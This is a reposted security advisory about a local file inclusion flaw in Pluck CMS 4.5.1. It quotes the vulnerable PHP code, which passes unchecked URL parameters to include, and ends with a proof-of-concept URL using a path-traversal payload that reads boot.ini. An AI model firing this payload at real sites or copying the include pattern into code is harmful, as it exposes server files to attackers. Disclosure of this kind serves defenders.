手机
当前位置:查字典教程网 >网络安全 >Exploit >Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)
Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)
摘要:##########################www.BugReport.ir###########################A...

########################## www.BugReport.ir #########################

#

# AmnPardaz Security Research Team

#

# Title: Pluck Local File inclusion

# Vendor: http://www.pluck-cms.org

# Bug: Local File Inclusion

# Vulnerable Version: 4.5.1 (prior versions also may be affected)

# Exploitation: Remote with browser

# Fix: N/A

###################################################################

####################

- Description:

#################### Pluck is a content management system, written in php.

####################

- Vulnerability:

#################### --> Local File Inclusion Input passed to multiple parameters in "predefined_variables.php" are not properly verified

before being used to include files.

This can be exploited to include arbitrary files from local resources. Code Snippet:

/data/inc/themes/predefined_variables.php #line:15-38 //Include Translation data

include ("data/settings/langpref.php");

include ("data/inc/lang/$langpref");

//Get Site-title

$sitetitle = file_get_contents("data/settings/title.dat"); //Get the page-data

$filetoread = $_GET['file'];

$album = $_GET['album'];

$blogpost = $_GET['blogpost'];

$cat = $_GET['cat']; if (($filetoread) && (file_exists("data/content/$filetoread"))) {

include "data/content/$filetoread"; } elseif ($album) {

$title = $album; } elseif ($blogpost) {

include("data/blog/$cat/posts/$blogpost"); } elseif ((!file_exists("data/content/$filetoread")) && (!$album) && (!$blogpost)) {

$title = $lang_front1;

$content = $lang_front2; }

POC: http://localhost/pluck-4_5_1/data/inc/themes/predefined_variables.php?blogpost=../../../../../../../../boot.ini ####################

- Credit :

####################

AmnPardaz Security Research Team

Contact: admin[4t}bugreport{d0t]ir

www.BugReport.ir

www.AmnPardaz.comz

【Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)】相关文章:

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

TGS CMS 0.3.2r2 Remote Code Execution Exploit

Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability

Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

EO Video 1.36 Local Heap Overflow DOS / PoC

DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit

精品推荐
分类导航